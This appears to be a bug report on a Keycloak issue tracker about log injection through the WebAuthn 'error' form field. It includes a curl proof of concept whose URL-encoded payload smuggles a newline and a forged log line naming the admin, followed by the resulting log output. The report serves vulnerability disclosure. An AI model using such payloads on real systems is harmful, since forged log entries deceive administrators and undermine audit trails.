-
Bug
-
Resolution: Done
-
Undefined
-
None
-
None
-
False
-
-
False
-
-
Before reporting an issue
[X] I have read and understood the above terms for submitting issues, and I understand that my issue may be closed without action if I do not follow them.
Area
authentication/webauthn
Describe the bug
Errors in browser client during setup/auth with "Security Key login" (WebAuthn) are written into the form, send to Keycloak and written to log without escaping. Any content could be send with this request and therefore allows log injection.
Version
22.0.5
Expected behavior
Message from user input are escaped to prevent (log) injection attacks.
Actual behavior
Request data is written to in log without escaping and allows log injection.
How to Reproduce?
- Start login with a user, who is required to setup a second auth factor
- Configure "Security-Token"
- Get form URL (<FORM_URL>) from page source code
- Run command in terminal:
```shell
curl '<FORM_URL>' \
-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Cookie: AUTH_SESSION_ID=9249c14d-1baa-43ba-a110-bbcdff689e9e.19d58cc8a8cf-28439; AUTH_SESSION_ID_LEGACY=9249c14d-1baa-43ba-a110-bbcdff689e9e.19d58cc8a8cf-28439; KC_STATE_CHECKER=eyJhbGciOiJIUzI1NiIsInR5cCIgOiAiSldUIiwia2lkIiA6ICI3NzQ1OTFkOC1hNGNlLTQ5MjUtODFlZS01NWQ5ZmM0YjhlZTgifQ.eyJta3kiOiJpbnZhbGlkQ29kZU1lc3NhZ2UiLCJtdHkiOiJFUlJPUiIsIm1wYXIiOltdLCJzdGF0Ijo0MDAsInN0MiI6ImY0NGE4NDU1LTU5MWYtNGNjYi1hZWZiLTIxYmQwMzE5OTRjYiJ9.AruNFsHMyHt1SF31TaRsN875qquIMSKhxp-dwfE4zts; KC_RESTART=eyJhbGciOiJIUzI1NiIsInR5cCIgOiAiSldUIiwia2lkIiA6ICI3NzQ1OTFkOC1hNGNlLTQ5MjUtODFlZS01NWQ5ZmM0YjhlZTgifQ.eyJjaWQiOiJhY2NvdW50LWNvbnNvbGUiLCJwdHkiOiJvcGVuaWQtY29ubmVjdCIsInJ1cmkiOiJodHRwOi8vbG9jYWxob3N0OjgwODAvYXV0aC9yZWFsbXMvYzEtczEtaTEvYWNjb3VudC8jLyIsImFjdCI6IkFVVEhFTlRJQ0FURSIsIm5vdGVzIjp7InNjb3BlIjoib3BlbmlkIiwiaXNzIjoiaHR0cDovL2xvY2FsaG9zdDo4MDgwL2F1dGgvcmVhbG1zL2MxLXMxLWkxIiwicmVzcG9uc2VfdHlwZSI6ImNvZGUiLCJjb2RlX2NoYWxsZW5nZV9tZXRob2QiOiJTMjU2IiwicmVkaXJlY3RfdXJpIjoiaHR0cDovL2xvY2FsaG9zdDo4MDgwL2F1dGgvcmVhbG1zL2MxLXMxLWkxL2FjY291bnQvIy8iLCJzdGF0ZSI6IjNjNDUzMWJkLTYxNTMtNDRiYS05MDc1LWE1NzcyY2Y4MTA5ZSIsIm5vbmNlIjoiZjQ4MDUzNDktZDIxMi00Mzc3LThmODMtYTBjOGZjZDQxY2UzIiwiY29kZV9jaGFsbGVuZ2UiOiJOa1RxTHFWUl9jWjJFVEd1VGZxOHJTYVpHdzdCd1BXdUdSVFVHa29oSjlzIiwicmVzcG9uc2VfbW9kZSI6ImZyYWdtZW50In19.U2_FfhLkAzJILgHfVYVL1-4dE4B7oEULDtRTl5XpgBw; __snackbar=IjZmMjA3NGFiZTg4MDUxZGQi.3USigr8kqbvE758yaKF5QkElgCUgieTfik%2FewsWYuhw; __session=ImE4ZTFmZTRhMTUzZmNlZjIi.MsiBCXKE1XZZHwcBe2lbTQ2RwnoTNplIR5sByOMB97Q' \
--data-raw 'clientDataJSON=&attestationObject=&publicKeyCredentialId=&authenticatorLabel=&transports=&error=invalid%5Fuser%5Fcredentials%2C%20credential%5Ftype%3Dwebauthn%2C%20auth%5Fmethod%3Dopenid%2Dconnect%2C%20web%5Fauthn%5Fregistration%5Ferror%5Fdetail%3D%27NotAllowedError%3A%20The%20operation%20either%20timed%20out%20or%20was%20not%20allowed%2E%20See%3A%20https%3A%2F%2Fwww%2Ew3%2Eorg%2FTR%2Fwebauthn%2D2%2F%23sctn%2Dprivacy%2Dconsiderations%2Dclient%2E%27%2C%20custom%5Frequired%5Faction%3Dwebauthn%2Dregister%2C%20response%5Ftype%3Dcode%2C%20web%5Fauthn%5Fregistration%5Ferror%3Dwebauthn%2Derror%2Dregister%2Dverification%2C%20redirect%5Furi%3Dhttp%3A%2F%2Flocalhost%3A8080%2Fauth%2Frealms%2Fc1%2Ds1%2Di1%2Faccount%2F%23%2F%2C%20remember%5Fme%3Dfalse%2C%20code%5Fid%3D9249c14d%2D1baa%2D43ba%2Da110%2Dbbcdff689e9e%2C%20response%5Fmode%3Dfragment%2C%20username%3Da%27%0A2023%2D11%2D03%2009%3A32%3A33%2C614%20WARN%20%20%5Borg%2Ekeycloak%2Eevents%5D%20%28executor%2Dthread%2D14%29%20type%3DCUSTOM%5FREQUIRED%5FACTION%5FERROR%2C%20realmId%3Dinst%2D001%2D001%2D001%2C%20clientId%3Daccount%2Dconsole%2C%20userId%3Dd5410969%2D4a04%2D4f35%2D87d3%2D76b9343119b2%2C%20ipAddress%3D172%2E18%2E0%2E1%2C%20error%3Dthe%20admin%20did%20something%20very%20evil%21%21%21%2C%20remember%5Fme%3Dfalse%2C%20code%5Fid%3D9249c14d%2D1baa%2D43ba%2Da110%2Dbbcdff689e9e%2C%20response%5Fmode%3Dfragment%2C%20username%3Dadmin'
```
The decoded error part contains manipulated log entries:
```
invalid_user_credentials, credential_type=webauthn, auth_method=openid-connect, web_authn_registration_error_detail='NotAllowedError: The operation either timed out or was not allowed. See: https://www.w3.org/TR/webauthn-2/#sctn-privacy-considerations-client.', custom_required_action=webauthn-register, response_type=code, web_authn_registration_error=webauthn-error-register-verification, redirect_uri=http://localhost:8080/auth/realms/c1-s1-i1/account/#/, remember_me=false, code_id=9249c14d-1baa-43ba-a110-bbcdff689e9e, response_mode=fragment, username=a'
2023-11-03 09:32:33,614 WARN [org.keycloak.events] (executor-thread-14) type=CUSTOM_REQUIRED_ACTION_ERROR, realmId=inst-001-001-001, clientId=account-console, userId=d5410969-4a04-4f35-87d3-76b9343119b2, ipAddress=172.18.0.1, error=the admin did something very evil!!!, remember_me=false, code_id=9249c14d-1baa-43ba-a110-bbcdff689e9e, response_mode=fragment, username=admin
```
- after sending that, the log contains the following entries:
```
keycloak-base-keycloak-1 | 2023-11-03 10:14:01,861 WARN [org.keycloak.authentication.requiredactions.WebAuthnRegister] (executor-thread-52) WebAuthn API .create() response validation failure. invalid_user_credentials, credential_type=webauthn, auth_method=openid-connect, web_authn_registration_error_detail='NotAllowedError: The operation either timed out or was not allowed. See: https://www.w3.org/TR/webauthn-2/#sctn-privacy-considerations-client.', custom_required_action=webauthn-register, response_type=code, web_authn_registration_error=webauthn-error-register-verification, redirect_uri=http://localhost:8080/auth/realms/c1-s1-i1/account/#/, remember_me=false, code_id=9249c14d-1baa-43ba-a110-bbcdff689e9e, response_mode=fragment, username=a'
keycloak-base-keycloak-1 | 2023-11-03 09:32:33,614 WARN [org.keycloak.events] (executor-thread-14) type=CUSTOM_REQUIRED_ACTION_ERROR, realmId=inst-001-001-001, clientId=account-console, userId=d5410969-4a04-4f35-87d3-76b9343119b2, ipAddress=172.18.0.1, error=the admin did something very evil!!!, remember_me=false, code_id=9249c14d-1baa-43ba-a110-bbcdff689e9e, response_mode=fragment, username=admin
keycloak-base-keycloak-1 | 2023-11-03 10:14:01,870 WARN [org.keycloak.events] (executor-thread-52) type=CUSTOM_REQUIRED_ACTION_ERROR, realmId=inst-001-001-001, clientId=account-console, userId=d5410969-4a04-4f35-87d3-76b9343119b2, ipAddress=172.18.0.1, error=invalid_user_credentials, credential_type=webauthn, auth_method=openid-connect, web_authn_registration_error_detail='invalid_user_credentials, credential_type=webauthn, auth_method=openid-connect, web_authn_registration_error_detail='NotAllowedError: The operation either timed out or was not allowed. See: https://www.w3.org/TR/webauthn-2/#sctn-privacy-considerations-client.', custom_required_action=webauthn-register, response_type=code, web_authn_registration_error=webauthn-error-register-verification, redirect_uri=http://localhost:8080/auth/realms/c1-s1-i1/account/#/, remember_me=false, code_id=9249c14d-1baa-43ba-a110-bbcdff689e9e, response_mode=fragment, username=a'
keycloak-base-keycloak-1 | 2023-11-03 09:32:33,614 WARN [org.keycloak.events] (executor-thread-14) type=CUSTOM_REQUIRED_ACTION_ERROR, realmId=inst-001-001-001, clientId=account-console, userId=d5410969-4a04-4f35-87d3-76b9343119b2, ipAddress=172.18.0.1, error=the admin did something very evil!!!, remember_me=false, code_id=9249c14d-1baa-43ba-a110-bbcdff689e9e, response_mode=fragment, username=admin', custom_required_action=webauthn-register, response_type=code, web_authn_registration_error=webauthn-error-register-verification, redirect_uri=http://localhost:8080/auth/realms/c1-s1-i1/account/#/, remember_me=false, code_id=9249c14d-1baa-43ba-a110-bbcdff689e9e, response_mode=fragment, username=a
```
This is only a poc, more sophisticated log manipulation is certainly possible.
Anything else?
This has been reported as a vulnerability, but was considered a security hardening issue.
- links to